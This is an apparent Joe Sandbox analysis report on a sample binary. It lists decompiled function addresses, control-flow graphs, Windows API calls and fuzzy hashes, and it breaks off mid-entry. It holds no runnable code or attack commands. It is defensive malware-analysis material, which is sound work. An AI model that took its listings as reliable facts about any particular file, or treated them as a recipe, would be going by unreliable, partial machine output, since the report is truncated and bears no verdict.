                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,007C9F70,00000000,00000000), ref: 0040445B
                                                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                                                                          • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(007C9F70,007C9F70,00002710), ref: 00402BE0
                                                                          • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                          • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(007C9F70,007C9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                                                                          • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,007C9F70,007C8968,00000000,00000000), ref: 00401E9B
                                                                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,007C9F70,007C8968,00000000,00000000,00000000), ref: 00404636
                                                                          • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,007C9F70), ref: 004054A5
                                                                          • Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                                                                          • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                                                                          • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                                                                          • Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                                                                        • String ID: pA
                                                                        • API String ID: 2577741277-3402996844
                                                                        • Opcode ID: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
                                                                        • Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
                                                                        • Opcode Fuzzy Hash: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
                                                                        • Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A
                                                                        Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000000,007C89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                        • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,007C89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                                                                          • Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B
                                                                          • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                          • Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(007C9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
                                                                          • Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,007C9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921
                                                                          • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                                                                        • String ID: *pA$*pA
                                                                        • API String ID: 2955313036-2893952571
                                                                        • Opcode ID: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
                                                                        • Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
                                                                        • Opcode Fuzzy Hash: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
                                                                        • Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A
                                                                        Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                          • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                                                          • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,pF|,00000000), ref: 00401BDE
                                                                        • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                                                                        • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,pF|), ref: 00401C03
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                        • String ID:
                                                                        • API String ID: 983379767-0
                                                                        • Opcode ID: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
                                                                        • Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
                                                                        • Opcode Fuzzy Hash: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
                                                                        • Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E
                                                                        Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 846 40b6a0-40b6b4 847 40b7a7-40b7ad 846->847 848 40b6ba-40b6be 846->848 849 40b6c0-40b6e8 SetFilePointer 848->849 850 40b6eb-40b6f5 848->850 849->850 851 40b6f7-40b702 850->851 852 40b768-40b773 call 40b0c0 850->852 853 40b753-40b765 851->853 854 40b704-40b705 851->854 861 40b795-40b7a2 852->861 862 40b775-40b792 WriteFile 852->862 856 40b707-40b70a 854->856 857 40b73c-40b750 854->857 859 40b727-40b739 856->859 860 40b70c-40b70d 856->860 863 40b711-40b724 memcpy 860->863 861->863
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
                                                                        • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B712
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointermemcpy
                                                                        • String ID:
                                                                        • API String ID: 1104741977-0
                                                                        • Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                                                                        • Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
                                                                        • Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                                                                        • Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA
                                                                        Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 864 40e560-40e587 TlsGetValue 865 40e5a6-40e5c5 RtlReAllocateHeap 864->865 866 40e589-40e5a4 RtlAllocateHeap 864->866 867 40e5c7-40e5ed call 40ea40 865->867 866->867
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                        • RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                        • RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap$Value
                                                                        • String ID:
                                                                        • API String ID: 2497967046-0
                                                                        • Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                                                                        • Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
                                                                        • Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                                                                        • Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94
                                                                        Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 870 40ad45-40ad52 871 40ad54-40ad86 wcsncpy wcslen 870->871 872 40adbd 870->872 874 40ad9e-40ada6 871->874 873 40adbf-40adc2 872->873 875 40ad88-40ad8f 874->875 876 40ada8-40adbb CreateDirectoryW 874->876 877 40ad91-40ad94 875->877 878 40ad9b 875->878 876->873 877->878 879 40ad96-40ad99 877->879 878->874 879->876 879->878
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectorywcslenwcsncpy
                                                                        • String ID:
                                                                        • API String ID: 961886536-0
                                                                        • Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                                                                        • Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
                                                                        • Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                                                                        • Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A
                                                                        Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 880 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00408DFB
                                                                        • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                        • CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CommonControlsInitInitializememset
                                                                        • String ID:
                                                                        • API String ID: 2179856907-0
                                                                        • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                                                                        • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                                                                        • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                                                                        • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                                                                        Function 004099A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 881 4099a5-4099aa 882 4099c4 881->882 883 4099ac-4099b2 881->883 884 4099b4 883->884 885 4099b9-4099be SetEnvironmentVariableW 883->885 884->885 885->882
                                                                        APIs
                                                                        • SetEnvironmentVariableW.KERNELBASE(007C9F70,007C9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentVariable
                                                                        • String ID: $0A
                                                                        • API String ID: 1431749950-513306843
                                                                        • Opcode ID: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
                                                                        • Instruction ID: aa531fc2ff4271b490b4da26c39a2883f909eecf40e951fe565ba9eea3f0378e
                                                                        • Opcode Fuzzy Hash: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
                                                                        • Instruction Fuzzy Hash: 36C012B0204201ABD710CA04CD04B67BBE4EB50345F00C43EB184913B1C338CC40DB05
                                                                        Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 886 40b440-40b459 call 40db18 889 40b4ee-40b4f3 886->889 890 40b45f-40b47e CreateFileW 886->890 891 40b480-40b482 890->891 892 40b4d2-40b4d5 890->892 891->892 895 40b484-40b48b 891->895 893 40b4d7 892->893 894 40b4d9-40b4e0 call 40da8a 892->894 893->894 900 40b4e5-40b4eb 894->900 897 40b4a0 895->897 898 40b48d-40b49e HeapAlloc 895->898 899 40b4a3-40b4ca 897->899 898->899 901 40b4cc 899->901 902 40b4ce-40b4d0 899->902 901->902 902->892 902->900
                                                                        APIs
                                                                          • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                                                                          • Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
                                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                                                        • String ID:
                                                                        • API String ID: 3705299215-0
                                                                        • Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                                                                        • Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
                                                                        • Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                                                                        • Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8
                                                                        Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA
                                                                        • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                                                                        • memset.MSVCRT ref: 0040E2D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateFreememset
                                                                        • String ID:
                                                                        • API String ID: 2774703448-0
                                                                        • Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                                                                        • Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
                                                                        • Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                                                                        • Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5
                                                                        Function 00401FBA Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402011
                                                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040201C
                                                                          • Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D1
                                                                          • Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                                                                          • Part of subcall function 00405430: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                                                                          • Part of subcall function 00405430: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                        • String ID:
                                                                        • API String ID: 1205394408-0
                                                                        • Opcode ID: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
                                                                        • Instruction ID: d40c1fb095c70f871a48011b079aac708deae745ba771cefaa1841cdafdcac49
                                                                        • Opcode Fuzzy Hash: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
